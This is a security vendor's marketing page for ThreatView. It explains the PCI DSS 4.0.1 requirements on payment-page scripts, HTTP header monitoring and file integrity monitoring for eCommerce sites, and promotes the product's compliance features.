PCI 4.0.1 - Complying with 6.4.3, 11.6.1 AND 11.5.2

Understanding PCI DSS 4.0.1 and How ThreatView Can Help

What is the PCI DSS?

The Payment Card Industry Data Security Standard (PCI DSS) is a set of guidelines that ensures the safety of card transactions worldwide. Created by the PCI Security Standards Council, these standards aim to protect against data theft and fraud in debit and credit card transactions.

PCI DSS 4.0.1 applies to all entities involved with cardholder data (CHD) and sensitive authentication data (SAD), including:

• Merchants
• Processors
• Acquirers
• Issuers
• Service providers.

Recent Updates to PCI DSS 4.0.1 - for eCommerce Merchants

The PCI Security Standards Council recently announced important updates to requirements 6.4.3 and 11.6.1, focusing in on those eCommerce merchants using inline frames (iframes), however they also said that Self Assessment Questionnaire A merchants need to confirm that their site is not susceptible to attacks from scripts that could affect the merchant's eCommerce systems.  In other words, while SAQ A merchants don't need to have these controls in place for validating their compliance, they still need to ensure they are secure.  

Requirement 6.4.3: Managing Third-Party Scripts

This requirement mandates that websites processing digital payments must:

• Confirm all third-party scripts on payment pages are authorised
• Ensure script integrity
• Maintain a complete inventory with written justification for each script.

While the implementation details are flexible, ThreatView simplifies compliance by:

• Automatically, in real-time, maintaining an inventory across all pages, including payment pages
• Displaying script payloads for each request
• Monitoring code changes and updates
• Alerting you to potentially malicious actions or unauthorised changes
• We monitor in real time and report generation can be performed for any date in the prior 12 months to support your PCI DSS Compliance.

Requirement 11.6.1: Monitoring HTTP Headers for Changes

This more technically challenging requirement states that:

• Personnel must be alerted to unauthorised changes in HTTP headers and payment page scripts
• HTTP headers and payment pages must be evaluated when changes occur
• Reports must be generated at least weekly (as per Requirement 12.3.1).

These requirements can be challenging to meet manually, especially given the dynamic nature of third-party JavaScript.

ThreatView addresses this by:

• Monitoring all HTTP Headers and tracking changes.
• Generating compliance reports on demand for any dates within the past 12 months.

Beyond Compliance: A Comprehensive Approach

While PCI DSS focuses on the payment pages, we expect these controls to drive change in the attacker tactics and so we strongly recommend monitoring of key security data points across your entire website.  

ThreatView provides this comprehensive security by:

• Tracking changes across all pages (PCI 11.5.2)
• Monitoring for eCommerce-specific threats - ThreatView has one of the most comprehensive eCommerce threat detection capabilities in the industry
• Supporting diagnostics and enabling rapid response when issues arise - for example,  showing what changes have been made, with the ability to roll back those changes to quickly regain control.

Requirement 11.5.2: FIM for eCommerce Websites.  AKA File Change Monitoring / File Integrity Monitoring (FIM)

One of the most challenging PCI requirements to implement for an eCommerce merchant is File Integrity Monitoring (FIM).  In our experience (including over 16 years of Foregenix forensic experience)  almost no eCommerce merchants seem to be able to implement an effective FIM control - mainly because it is very challenging to implement AND then to maintain.  In fact, there are not many FIM solutions that support the eCommerce industry - and none (apart from ThreatView Advanced Edition, that we're aware of) that integrate with robust threat detection capabilities.

However, the value that a robust FIM system can bring an eCommerce business is huge - especially when battling an intruder/cyber criminal.  A good FIM solution will enable an eCommerce business to track all changes made to their website, particularly the insertion of malware.  What else was changed, what other bits of code (beyond the digital skimmer) may have been introduced by the attacker?  

A good FIM solution will help an eCommerce business identify those changes and enable them to be "undone", QUICKLY.  Time to resolution is the key - securing the site, protecting client data, and reducing the time (and cost) of searching for the small changes that a criminal may have introduced - the needles in the haystack.  A good FIM solution will show  those changes quickly.

And this is exactly what ThreatView Advanced Edition provides - comprehensive File Integrity Monitoring for eCommerce sites.  Useful at a forensic-level for managing and mitigating cyber attacks.  An extremely useful solution for a team under pressure to defend an online eCommerce business.  

And that is why it is also PCI requirement 11.5.2.  

How ThreatView Compares to Alternatives

Many traditional solutions focus solely on checking compliance boxes rather than delivering robust security:

Approach

Limitations

Crawler-based scanning

May miss hidden scripts and sophisticated database-driven attacks

Content Security Policies (CSPs)

Focus on script sources rather than payloads; challenged to detect breached sources or monitor dynamic script behaviour

Client-side JS detection ("Agents")

Set up traps that sophisticated attackers can detect and bypass; often miss dynamic or user-specific threats

The ThreatView Advantage

Drawing on 20 years of experience in PCI forensic investigations, ThreatView offers a multi-layered approach that combines:

• Industry-leading e-commerce threat intelligence
• Forensic-level file change monitoring (PCI 11.5.2)
• Real-time checkout monitoring (PCI 6.4.3, 11.6.1)
• Comprehensive threat detection across files, databases, and external connections

Our free tier supports PCI DSS 6.4.3 compliance, while ThreatView Advanced Edition provides comprehensive monitoring that supports requirements 6.4.3, 11.5.2, and 11.6.1 - and comes with a breach protection warranty.

Contact us today to learn more about how ThreatView can help secure your eCommerce environment while ensuring PCI DSS compliance.

GET STARTED WITH THREATVIEW

‍